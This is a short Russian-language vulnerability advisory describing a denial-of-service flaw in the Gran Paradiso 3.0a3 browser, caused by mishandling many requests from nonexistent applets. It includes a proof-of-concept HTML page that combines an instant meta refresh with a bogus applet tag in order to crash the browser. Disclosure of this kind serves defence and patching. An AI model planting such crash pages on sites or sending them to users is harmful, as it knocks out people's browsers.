Программа: Gran Paradiso 3.0a3

Уязвимость позволяет удаленному злоумышленнику выполнить DoS атаку на целевую систему. Уязвимость существует из-за того, что Gran Paradiso не в состоянии обрабатывать большое число запросов от несуществующих аплетов. Атакующий может передать специально сформированные запросы, обработка которых после обновления страницы приведет к отказу системы в обслуживании.

Пример:

<html>
<head>
<meta http-equiv='Refresh' content='0;url=nea.html'>
<applet name='$$$$$$$$$$$$' code='$$$$$$$$$$$$' archive='$$$$$$$$$$$$' width='160' height='160'>
</applet>
</meta>
</head>
</html>



Оставить мнение